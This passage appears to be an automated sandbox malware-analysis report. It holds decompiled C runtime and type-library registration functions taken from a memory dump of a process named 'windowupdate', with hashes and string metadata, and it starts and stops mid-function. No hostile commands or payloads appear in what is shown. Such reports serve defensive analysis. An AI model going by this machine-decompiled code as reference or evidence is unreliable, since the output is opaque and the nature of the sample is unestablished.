                      								_t217 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0, L"%ls", L"buffer_size % 2 == 0");
                      								_t288 = _t288 + 0x18;
                      								__eflags = _t217 - 1;
                      								if(_t217 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v124;
                      							if(_v124 != 0) {
                      								L20:
                      								__eflags =  *( *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4)) + 0x28 + (_a4 & 0x0000003f) * 0x38) & 0x20;
                      								if(__eflags != 0) {
                      									E00DB5510(_a4, 0, 0, 2);
                      									_t288 = _t288 + 0x10;
                      								}
                      								_v100 = _a8;
                      								_v20 = 0;
                      								_v16 = 0;
                      								_v12 = 0;
                      								_t173 = E00DB3F00(_t222, _a8, _t286, __eflags, _a4);
                      								_t289 = _t288 + 4;
                      								__eflags = _t173 & 0x000000ff;
                      								if((_t173 & 0x000000ff) == 0) {
                      									_t174 = (_a4 & 0x0000003f) * 0x38;
                      									_t233 =  *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4));
                      									_t270 =  *(_t233 + _t174 + 0x28) & 0x80;
                      									__eflags =  *(_t233 + _t174 + 0x28) & 0x80;
                      									if(( *(_t233 + _t174 + 0x28) & 0x80) == 0) {
                      										_t177 = E00DB3130( &_v196, _a4, _v100, _a12);
                      										_t289 = _t289 + 0x10;
                      										_v92 =  *_t177;
                      										_v88 =  *((intOrPtr*)(_t177 + 4));
                      										_v84 =  *((intOrPtr*)(_t177 + 8));
                      										_t233 = _v92;
                      										_v20 = _v92;
                      										_t270 = _v88;
                      										_v16 = _v88;
                      										_v12 = _v84;
                      									} else {
                      										_v108 = _v93;
                      										__eflags = _v108;
                      										if(_v108 == 0) {
                      											_t193 = E00DB3FE0(_t222, _t285, _t286,  &_v160, _a4, _v100, _a12);
                      											_t289 = _t289 + 0x10;
                      											_v56 =  *_t193;
                      											_v52 =  *((intOrPtr*)(_t193 + 4));
                      											_v48 =  *((intOrPtr*)(_t193 + 8));
                      											_v20 = _v56;
                      											_t233 = _v52;
                      											_v16 = _v52;
                      											_t270 = _v48;
                      											_v12 = _v48;
                      										} else {
                      											__eflags = _v108 - 1;
                      											if(_v108 == 1) {
                      												_t196 = E00DB43F0(_t222, _t285, _t286,  &_v184, _a4, _v100, _a12);
                      												_t289 = _t289 + 0x10;
                      												_v80 =  *_t196;
                      												_v76 =  *((intOrPtr*)(_t196 + 4));
                      												_v72 =  *((intOrPtr*)(_t196 + 8));
                      												_v20 = _v80;
                      												_t233 = _v76;
                      												_v16 = _v76;
                      												_t270 = _v72;
                      												_v12 = _v72;
                      											} else {
                      												__eflags = _v108 - 2;
                      												if(_v108 == 2) {
                      													_t200 = E00DB41E0(_t222, _t285, _t286,  &_v172, _a4, _v100, _a12);
                      													_t289 = _t289 + 0x10;
                      													_v68 =  *_t200;
                      													_v64 =  *((intOrPtr*)(_t200 + 4));
                      													_v60 =  *((intOrPtr*)(_t200 + 8));
                      													_t233 = _v68;
                      													_v20 = _v68;
                      													_t270 = _v64;
                      													_v16 = _v64;
                      													_v12 = _v60;
                      												}
                      											}
                      										}
                      									}
                      								} else {
                      									_t270 = _v93;
                      									_v104 = _v93;
                      									__eflags = _v104;
                      									if(__eflags == 0) {
                      										_t205 = E00DB31C0(_t222, _t285, _t286, __eflags,  &_v136, _a4, _v100, _a12);
                      										_t289 = _t289 + 0x10;
                      										_v32 =  *_t205;
                      										_v28 =  *((intOrPtr*)(_t205 + 4));
                      										_v24 =  *((intOrPtr*)(_t205 + 8));
                      										_t233 = _v32;
                      										_v20 = _v32;
                      										_t270 = _v28;
                      										_v16 = _v28;
                      										_v12 = _v24;
                      									} else {
                      										__eflags = _v104;
                      										if(_v104 > 0) {
                      											__eflags = _v104 - 2;
                      											if(_v104 <= 2) {
                      												_t209 = E00DB3DF0(_t222, _t285, _t286,  &_v148, _v100, _a12);
                      												_t289 = _t289 + 0xc;
                      												_v44 =  *_t209;
                      												_v40 =  *((intOrPtr*)(_t209 + 4));
                      												_v36 =  *((intOrPtr*)(_t209 + 8));
                      												_t233 = _v44;
                      												_v20 = _v44;
                      												_t270 = _v40;
                      												_v16 = _v40;
                      												_v12 = _v36;
                      											}
                      										}
                      									}
                      								}
                      								__eflags = _v16;
                      								if(_v16 != 0) {
                      									_t181 = _v16 - _v12;
                      									__eflags = _v16 - _v12;
                      								} else {
                      									__eflags = _v20;
                      									if(_v20 == 0) {
                      										_t270 = (_a4 & 0x0000003f) * 0x38;
                      										_t185 =  *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4));
                      										_t241 =  *(_t185 + _t270 + 0x28) & 0x40;
                      										__eflags =  *(_t185 + _t270 + 0x28) & 0x40;
                      										if(( *(_t185 + _t270 + 0x28) & 0x40) == 0) {
                      											L49:
                      											 *((intOrPtr*)(L00D82F70(_t241))) = 0x1c;
                      											_t187 = E00D82F40(_t241);
                      											 *_t187 = 0;
                      											_t181 = _t187 | 0xffffffff;
                      											goto L51;
                      										}
                      										_t270 = _v100;
                      										__eflags =  *_v100 - 0x1a;
                      										if( *_v100 != 0x1a) {
                      											goto L49;
                      										}
                      										_t181 = 0;
                      										goto L51;
                      									}
                      									__eflags = _v20 - 5;
                      									if(_v20 != 5) {
                      										_t270 = _v20;
                      										_t189 = E00D82F10(_t233, _v20);
                      									} else {
                      										 *((intOrPtr*)(L00D82F70(_t233))) = 9;
                      										_t189 = E00D82F40(_t233);
                      										 *_t189 = _v20;
                      									}
                      									_t181 = _t189 | 0xffffffff;
                      								}
                      							} else {
                      								 *((intOrPtr*)(E00D82F40(2))) = 0;
                      								 *((intOrPtr*)(L00D82F70(2))) = 0x16;
                      								_t181 = E00D82900(L"buffer_size % 2 == 0", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0) | 0xffffffff;
                      							}
                      							goto L51;
                      						}
                      						__eflags = _v93 - 1;
                      						if(_v93 != 1) {
                      							goto L20;
                      						}
                      						goto L12;
                      					} else {
                      						 *((intOrPtr*)(E00D82F40(_t223))) = 0;
                      						 *((intOrPtr*)(L00D82F70(_t223))) = 0x16;
                      						_t181 = E00D82900(L"buffer != nullptr", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0) | 0xffffffff;
                      						goto L51;
                      					}
                      				} else {
                      					_t181 = 0;
                      					L51:
                      					return E00D47280(_t181, _t222, _v8 ^ _t287, _t270, _t285, _t286);
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
                      • API String ID: 0-1420694404
                      • Opcode ID: 80b047ed19ba85e4966abcacf07e8e346ea26893d171846ea84d67ee701d5711
                      • Instruction ID: 4ab6eeeb14b27325875d399fdb6d405bfaf06b9c6fa0e8bda14108471e996bee
                      • Opcode Fuzzy Hash: 80b047ed19ba85e4966abcacf07e8e346ea26893d171846ea84d67ee701d5711
                      • Instruction Fuzzy Hash: 79E158B4E00248EFDB14DF99C885BEEBBF5AF48304F188159E51AAB396D7709941CF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00D9C35F(void* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
                      				signed int _v8;
                      				signed int _v12;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t63;
                      				intOrPtr* _t65;
                      				intOrPtr _t69;
                      				signed int _t70;
                      				intOrPtr* _t73;
                      				void* _t77;
                      				signed char _t82;
                      				signed int _t83;
                      				signed char _t86;
                      				void* _t87;
                      				intOrPtr* _t88;
                      				void* _t90;
                      				signed char _t94;
                      				signed int _t95;
                      				signed int _t96;
                      				signed int _t97;
                      				signed int _t99;
                      				void* _t101;
                      				void* _t102;
                      				void* _t106;
                      				signed int _t109;
                      				char* _t110;
                      				signed int _t111;
                      				signed char* _t112;
                      				intOrPtr _t115;
                      				void* _t116;
                      				signed int _t118;
                      				signed char* _t120;
                      				signed int _t121;
                      				void* _t122;
                      				signed char* _t123;
                      				signed int _t124;
                      				signed char* _t126;
                      				signed int _t127;
                      				char* _t128;
                      				intOrPtr _t131;
                      				signed int _t132;
                      				intOrPtr* _t133;
                      				intOrPtr _t134;
                      				void* _t135;
                      				intOrPtr _t136;
                      				void* _t137;
                      				void* _t138;
                      				void* _t139;
                      
                      				_t116 = __ecx;
                      				_t109 = _a16;
                      				_t63 = 0;
                      				_v12 = 0;
                      				_t127 = _a4;
                      				if(_t109 != 0) {
                      					__eflags = _t127;
                      					if(__eflags == 0) {
                      						L3:
                      						_t110 = L"((_Dst)) != NULL && ((_SizeInBytes)) > 0";
                      						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      						if(L00D84930(_t149, 2, _t128, 0x1e, _t63, L"%ls", _t110) == 1) {
                      							asm("int3");
                      						}
                      						_t65 = L00D82F70(_t116);
                      						_t131 = 0x16;
                      						_push(0);
                      						_push(0x1e);
                      						L6:
                      						_push(_t128);
                      						_push(L"_mbsnbcpy_s_l");
                      						_push(_t110);
                      						 *_t65 = _t131;
                      						E00D82900();
                      						L7:
                      						return _t131;
                      					}
                      					L10:
                      					_t132 = _a8;
                      					__eflags = _t132;
                      					if(__eflags == 0) {
                      						goto L3;
                      					}
                      					__eflags = _t109;
                      					if(_t109 != 0) {
                      						__eflags = _a12 - _t63;
                      						if(_a12 != _t63) {
                      							L00D66CC0(_t109,  &_v28, _t132, _a20);
                      							_t69 = _v20;
                      							__eflags =  *(_t69 + 8);
                      							if( *(_t69 + 8) != 0) {
                      								_t118 = _t132;
                      								_t121 = _t127;
                      								_v8 = _t118;
                      								__eflags = _t109 - 0xffffffff;
                      								if(_t109 != 0xffffffff) {
                      									_t133 = _a12;
                      									while(1) {
                      										_t70 =  *_t133;
                      										 *_t121 = _t70;
                      										_t121 = _t121 + 1;
                      										_t133 = _t133 + 1;
                      										__eflags = _t70;
                      										if(_t70 == 0) {
                      											break;
                      										}
                      										_t118 = _t118 - 1;
                      										__eflags = _t118;
                      										if(_t118 == 0) {
                      											break;
                      										}
                      										_t109 = _t109 - 1;
                      										__eflags = _t109;
                      										if(_t109 != 0) {
                      											continue;
                      										}
                      										break;
                      									}
                      									_a12 = _t133;
                      									_t132 = _a8;
                      									_v8 = _t118;
                      									__eflags = _t109;
                      									if(_t109 == 0) {
                      										 *_t121 = 0;
                      										_t121 = _t121 + 1;
                      										__eflags = _t121;
                      									}
                      									L41:
                      									__eflags = _t118;
                      									if(_t118 != 0) {
                      										__eflags = _t121 - _t127 - 2;
                      										if(_t121 - _t127 < 2) {
                      											L79:
                      											_t111 = _v12;
                      											L80:
                      											__eflags = _t132 - 0xffffffff;
                      											if(_t132 != 0xffffffff) {
                      												__eflags = _t132 - 0x7fffffff;
                      												if(_t132 != 0x7fffffff) {
                      													__eflags = _t132 - _t118 + 1 - _t132;
                      													if(_t132 - _t118 + 1 < _t132) {
                      														_t77 = E00D950C0();
                      														_t118 = _v8;
                      														_t122 = _t118 - 1;
                      														__eflags = _t77 - _t122;
                      														if(_t77 >= _t122) {
                      															_t77 = _t122;
                      														}
                      														__eflags = _t132 + 1 + _t127 - _t118;
                      														E00D4AF80(_t127 - _t118, _t132 + 1 + _t127 - _t118, 0xfe, _t77);
                      													}
                      												}
                      											}
                      											__eflags = _t111;
                      											if(_t111 == 0) {
                      												_t131 = 0;
                      												__eflags = 0;
                      												goto L89;
                      											} else {
                      												L87:
                      												_t73 = L00D82F70(_t118);
                      												_t131 = 0x2a;
                      												 *_t73 = _t131;
                      												L89:
                      												__eflags = _v16;
                      												if(_v16 != 0) {
                      													 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                      												}
                      												goto L7;
                      											}
                      										}
                      										_t112 = _t121 - 2;
                      										_t123 = _t112;
                      										__eflags = _t112 - _t127;
                      										if(_t112 < _t127) {
                      											L77:
                      											_t82 = _t112 - _t123;
                      											__eflags = _t82 & 0x00000001;
                      											if((_t82 & 0x00000001) == 0) {
                      												goto L79;
                      											}
                      											 *_t112 = 0;
                      											_t118 = _t118 + 1;
                      											_v8 = _t118;
                      											_t111 = 1;
                      											goto L80;
                      										}
                      										_t134 = _v20;
                      										while(1) {
                      											_t83 =  *_t123 & 0x000000ff;
                      											__eflags =  *(_t83 + _t134 + 0x19) & 0x00000004;
                      											if(( *(_t83 + _t134 + 0x19) & 0x00000004) == 0) {
                      												break;
                      											}
                      											_t123 = _t123 - 1;
                      											__eflags = _t123 - _t127;
                      											if(_t123 >= _t127) {
                      												continue;
                      											}
                      											break;
                      										}
                      										_t132 = _a8;
                      										goto L77;
                      									}
                      									__eflags =  *_a12 - _t118;
                      									if( *_a12 == _t118) {
                      										L44:
                      										_t124 = _t121 - 1;
                      										_t118 = _t124;
                      										__eflags = _t124 - _t127;
                      										if(_t124 < _t127) {
                      											L49:
                      											_t86 = _t124 - _t118;
                      											__eflags = _t86 & 0x00000001;
                      											if((_t86 & 0x00000001) == 0) {
                      												L51:
                      												__eflags = _t109 - 0xffffffff;
                      												if(_t109 != 0xffffffff) {
                      													 *_t127 = 0;
                      													__eflags = _t132 - 0xffffffff;
                      													if(__eflags != 0) {
                      														__eflags = _t132 - 0x7fffffff;
                      														if(__eflags != 0) {
                      															__eflags = _t132 - 1;
                      															if(__eflags > 0) {
                      																_t90 = E00D950C0();
                      																_t135 = _t132 - 1;
                      																__eflags = _t90 - _t135;
                      																if(_t90 >= _t135) {
                      																	_t90 = _t135;
                      																}
                      																E00D4AF80(_t127, _t127 + 1, 0xfe, _t90);
                      																_t139 = _t139 + 0xc;
                      															}
                      														}
                      													}
                      													_t130 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      													_t87 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl", 0xae, 0, L"%ls", L"(L\"Buffer is too small\" && 0)");
                      													__eflags = _t87 - 1;
                      													if(_t87 == 1) {
                      														asm("int3");
                      													}
                      													_t88 = L00D82F70(_t118);
                      													_t131 = 0x22;
                      													 *_t88 = _t131;
                      													E00D82900(L"(L\"Buffer is too small\" && 0)", L"_mbsnbcpy_s_l", _t130, 0xae, 0);
                      													goto L89;
                      												}
                      												__eflags = _t132 - 1;
                      												if(_t132 <= 1) {
                      													L60:
                      													 *((char*)(_t127 + _t132 - 1)) = 0;
                      													L61:
                      													_t131 = 0x50;
                      													goto L89;
                      												}
                      												_t126 = _t132 - 2 + _t127;
                      												_t120 = _t126;
                      												__eflags = _t126 - _t127;
                      												if(_t126 < _t127) {
                      													L57:
                      													_t94 = _t126 - _t120;
                      													__eflags = _t94 & 0x00000001;
                      													if((_t94 & 0x00000001) == 0) {
                      														goto L60;
                      													}
                      													 *_t126 = 0;
                      													_t95 = E00D950C0();
                      													__eflags = _t95;
                      													if(_t95 != 0) {
                      														 *((char*)(_t127 + _t132 - 1)) = 0xfe;
                      													}
                      													goto L61;
                      												}
                      												_t115 = _v20;
                      												while(1) {
                      													_t96 =  *_t120 & 0x000000ff;
                      													__eflags =  *(_t96 + _t115 + 0x19) & 0x00000004;
                      													if(( *(_t96 + _t115 + 0x19) & 0x00000004) == 0) {
                      														goto L57;
                      													}
                      													_t120 = _t120 - 1;
                      													__eflags = _t120 - _t127;
                      													if(_t120 >= _t127) {
                      														continue;
                      													}
                      													goto L57;
                      												}
                      												goto L57;
                      											}
                      											 *_t124 = 0;
                      											goto L87;
                      										}
                      										_t136 = _v20;
                      										while(1) {
                      											_t97 =  *_t118 & 0x000000ff;
                      											__eflags =  *(_t97 + _t136 + 0x19) & 0x00000004;
                      											if(( *(_t97 + _t136 + 0x19) & 0x00000004) == 0) {
                      												break;
                      											}
                      											_t118 = _t118 - 1;
                      											__eflags = _t118 - _t127;
                      											if(_t118 >= _t127) {
                      												continue;
                      											}
                      											break;
                      										}
                      										_t132 = _a8;
                      										goto L49;
                      									}
                      									__eflags = _t109 - 1;
                      									if(_t109 != 1) {
                      										goto L51;
                      									}
                      									goto L44;
                      								} else {
                      									goto L32;
                      								}
                      								while(1) {
                      									L32:
                      									_t99 =  *_a12;
                      									 *_t121 = _t99;
                      									_t121 = _t121 + 1;
                      									_a12 = _a12 + 1;
                      									__eflags = _t99;
                      									if(_t99 == 0) {
                      										goto L41;
                      									}
                      									_t118 = _t118 - 1;
                      									__eflags = _t118;
                      									_v8 = _t118;
                      									if(_t118 != 0) {
                      										continue;
                      									}
                      									goto L41;
                      								}
                      								goto L41;
                      							}
                      							_t131 = E00DB09A0(_t127, _t132, _a12, _t109);
                      							goto L89;
                      						}
                      						 *_t127 = _t63;
                      						__eflags = _t132 - 0xffffffff;
                      						if(__eflags != 0) {
                      							__eflags = _t132 - 0x7fffffff;
                      							if(__eflags != 0) {
                      								__eflags = _t132 - 1;
                      								if(__eflags > 0) {
                      									_t102 = E00D950C0();
                      									_t137 = _t132 - 1;
                      									__eflags = _t102 - _t137;
                      									if(_t102 >= _t137) {
                      										_t102 = _t137;
                      									}
                      									E00D4AF80(_t127, _t127 + 1, 0xfe, _t102);
                      									_t139 = _t139 + 0xc;
                      									_t63 = 0;
                      									__eflags = 0;
                      								}
                      							}
                      						}
                      						_t110 = L"(((_Src))) != NULL";
                      						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      						_t101 = L00D84930(__eflags, 2, _t128, 0x26, _t63, L"%ls", _t110);
                      						__eflags = _t101 - 1;
                      						if(_t101 == 1) {
                      							asm("int3");
                      						}
                      						_t65 = L00D82F70(_t116);
                      						_t131 = 0x16;
                      						_push(0);
                      						_push(0x26);
                      						goto L6;
                      					} else {
                      						 *_t127 = _t63;
                      						__eflags = _t132 - 0xffffffff;
                      						if(_t132 != 0xffffffff) {
                      							__eflags = _t132 - 0x7fffffff;
                      							if(_t132 != 0x7fffffff) {
                      								__eflags = _t132 - 1;
                      								if(_t132 > 1) {
                      									_t106 = E00D950C0();
                      									_t138 = _t132 - 1;
                      									__eflags = _t106 - _t138;
                      									if(_t106 >= _t138) {
                      										_t106 = _t138;
                      									}
                      									E00D4AF80(_t127, _t127 + 1, 0xfe, _t106);
                      								}
                      							}
                      						}
                      						L18:
                      						return 0;
                      					}
                      				}
                      				if(_t127 != 0) {
                      					goto L10;
                      				}
                      				_t149 = _a8;
                      				if(_a8 == 0) {
                      					goto L18;
                      				}
                      				goto L3;
                      			}

                      0x00d9c3ec
                      0x00d9c411
                      0x00000000
                      0x00d9c411
                      0x00d9c3dd
                      0x00d9c37b
                      0x00000000
                      0x00000000
                      0x00d9c37d
                      0x00d9c380
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$(((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$_mbsnbcpy_s_l$minkernel\crts\ucrt\src\desktopcrt\mbstring\mbsncpy_s.inl
                      • API String ID: 3007373345-974215673
                      • Opcode ID: 8d2fb4a4ab936424a8030620461c086753646f69557062c1d1cc1fea0f8b7bef
                      • Instruction ID: 93acd3f2b34811294c06082ecf5b9829e3c921c2edc39138cfc82b4ff233043f
                      • Opcode Fuzzy Hash: 8d2fb4a4ab936424a8030620461c086753646f69557062c1d1cc1fea0f8b7bef
                      • Instruction Fuzzy Hash: 05A1AA30B603565BCF316A2C8C55B7EBB55DF42728F2D626AE9609B2D2D671EC0083B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00D3B3D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v16;
                      				char _v28;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				char _v564;
                      				char _v576;
                      				signed int _v584;
                      				signed int _v589;
                      				struct HINSTANCE__* _v600;
                      				intOrPtr _v604;
                      				signed int _v608;
                      				intOrPtr _v612;
                      				intOrPtr _v616;
                      				void* _v620;
                      				signed int _t72;
                      				void* _t76;
                      				intOrPtr _t82;
                      				void* _t84;
                      				void* _t89;
                      				void* _t98;
                      				struct HINSTANCE__* _t101;
                      				_Unknown_base(*)()* _t103;
                      				signed char _t108;
                      				intOrPtr* _t152;
                      				void* _t154;
                      				void* _t160;
                      				void* _t161;
                      				signed int _t165;
                      				void* _t166;
                      				void* _t167;
                      
                      				_t162 = __esi;
                      				_t120 = __ebx;
                      				_t160 =  &_v620;
                      				memset(_t160, 0xcccccccc, 0x9a << 2);
                      				_t167 = _t166 + 0xc;
                      				_t161 = _t160 + 0x9a;
                      				_t72 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t72 ^ _t165;
                      				E00D32ED0( &_v16);
                      				E00D3E6E0( &_v28);
                      				_t76 = E00D3E760( &_v28);
                      				_v36 = E00D3A1D0(__ebx, _a4, _a8, E00D32F40( &_v16), _t76);
                      				if(_v36 < 0) {
                      					L18:
                      					_v616 = _v36;
                      					E00D36450( &_v28, __eflags);
                      					E00D330B0( &_v16, _t162);
                      					_t82 = _v616;
                      					L19:
                      					E00DC14C0(_t165, 0xd3b68c);
                      					_t84 = _t82;
                      					_t154 = _t152;
                      					return E00DC1520(E00D47280(_t84, _t120, _v8 ^ _t165, _t154, _t161, _t162), _t165 - _t167 + 0x268);
                      				}
                      				_v40 = 0;
                      				E00D32ED0( &_v576);
                      				_v620 = E00D3E710( &_v28);
                      				_t89 = E00D32F40( &_v576);
                      				_t162 = _t167;
                      				_t152 =  *((intOrPtr*)( *_v620 + 0x24));
                      				_v36 = E00DC1520( *_t152(_v620, 0xffffffff, 0, 0, 0, _t89), _t167 - _t167);
                      				_t172 = _v36;
                      				if(_v36 >= 0) {
                      					_t108 = E00D33000( &_v576, _t172, 0);
                      					_t173 = _t108 & 0x000000ff;
                      					if((_t108 & 0x000000ff) != 0) {
                      						E00D32720(__ebx, _t161, _t162, _t173,  &_v564, 0x104, _v576, E00D32EF0( &_v576, _t162));
                      						_t167 = _t167 + 0x10;
                      						_v604 = 0x206;
                      						if(_v604 >= 0x208) {
                      							E00D47730();
                      						}
                      						 *((short*)(_t165 + _v604 - 0x230)) = 0;
                      						_v608 = E00DBFE00(_t162,  &_v564) << 1;
                      						if(_v608 >= 0x208) {
                      							E00D47730();
                      						}
                      						 *((short*)(_t165 + _v608 - 0x230)) = 0;
                      						_t152 = 0;
                      						_v40 = _t165 + 0xfffffffffffffdd0;
                      					}
                      				}
                      				_v584 = 0;
                      				_v589 = 0;
                      				_v36 = E00D3A1A0( &_v589);
                      				_t177 = _v36;
                      				if(_v36 >= 0) {
                      					__eflags = (_v589 & 0x000000ff) - 1;
                      					if((_v589 & 0x000000ff) == 1) {
                      						_t101 = GetModuleHandleW(L"OLEAUT32.DLL");
                      						__eflags = _t167 - _t167;
                      						_v600 = E00DC1520(_t101, _t167 - _t167);
                      						__eflags = _v600;
                      						if(_v600 != 0) {
                      							_t103 = GetProcAddress(_v600, "RegisterTypeLibForUser");
                      							__eflags = _t167 - _t167;
                      							_v584 = E00DC1520(_t103, _t167 - _t167);
                      						}
                      					}
                      					__eflags = _v584;
                      					if(_v584 == 0) {
                      						_t152 = __imp__#163;
                      						_v584 = _t152;
                      					}
                      					_t162 = _t167;
                      					_t98 = _v584(E00D3E7B0( &_v28), E00D32F30( &_v16), _v40);
                      					__eflags = _t167 - _t167;
                      					_v36 = E00DC1520(_t98, _t167 - _t167);
                      					E00D330B0( &_v576, _t167);
                      					goto L18;
                      				}
                      				_t152 = _v36;
                      				_v612 = _t152;
                      				E00D330B0( &_v576, _t162);
                      				E00D36450( &_v28, _t177);
                      				E00D330B0( &_v16, _t162);
                      				_t82 = _v612;
                      				goto L19;
                      			}



































                      APIs
                      • ~Module.VCCORLIBD ref: 00D3B58A
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 00D3B5B5
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00D3B5DF
                        • Part of subcall function 00D32EF0: SysStringLen.OLEAUT32 ref: 00D32F07
                        • Part of subcall function 00D32720: __wcstombs_l.LIBCMTD ref: 00D32733
                      • ~Module.VCCORLIBD ref: 00D3B646
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3B663
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$AddressCheckHandleProcStackStringVars@8__wcstombs_l
                      • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
                      • API String ID: 1622416431-2666564778
                      • Opcode ID: eb3f477851e7bd9db1f5b22cbbbf3738a7d5c481d64726b8b8bb7a20c3c4590c
                      • Instruction ID: 213ad97996c3dea1693084ed8edb6506805a226a5171daca04c7304117ef22f9
                      • Opcode Fuzzy Hash: eb3f477851e7bd9db1f5b22cbbbf3738a7d5c481d64726b8b8bb7a20c3c4590c
                      • Instruction Fuzzy Hash: AE712D71D002289BCB24EB64DD5ABEDB7B4EF54310F1042A9E509B7291DB759E84CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00D4C270(intOrPtr _a4, intOrPtr _a8) {
                      				char _v5;
                      				char _v6;
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				intOrPtr* _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      
                      				_v32 = E00D4BF40(_a4);
                      				if(_v32 == 0) {
                      					_v44 = E00D4C030( &_v5);
                      					_v48 = E00D4C020( &_v6);
                      					E00D4BF60( &_v12, E00D5AC70(0, _a4 + 5, 0, _v48, _v44, 0x2800));
                      					if((E00D4BFE0( &_v12) & 0x000000ff) != 0) {
                      						_v16 = E00D82E00(E00D4C0C0( &_v12));
                      						while(_v16 != 0 &&  *((char*)(E00D4C0C0( &_v12) + _v16 - 1)) == 0x20) {
                      							 *((char*)(E00D4C0C0( &_v12) + _v16 - 1)) = 0;
                      							_v16 = _v16 - 1;
                      						}
                      						_v36 = _v16 + 1;
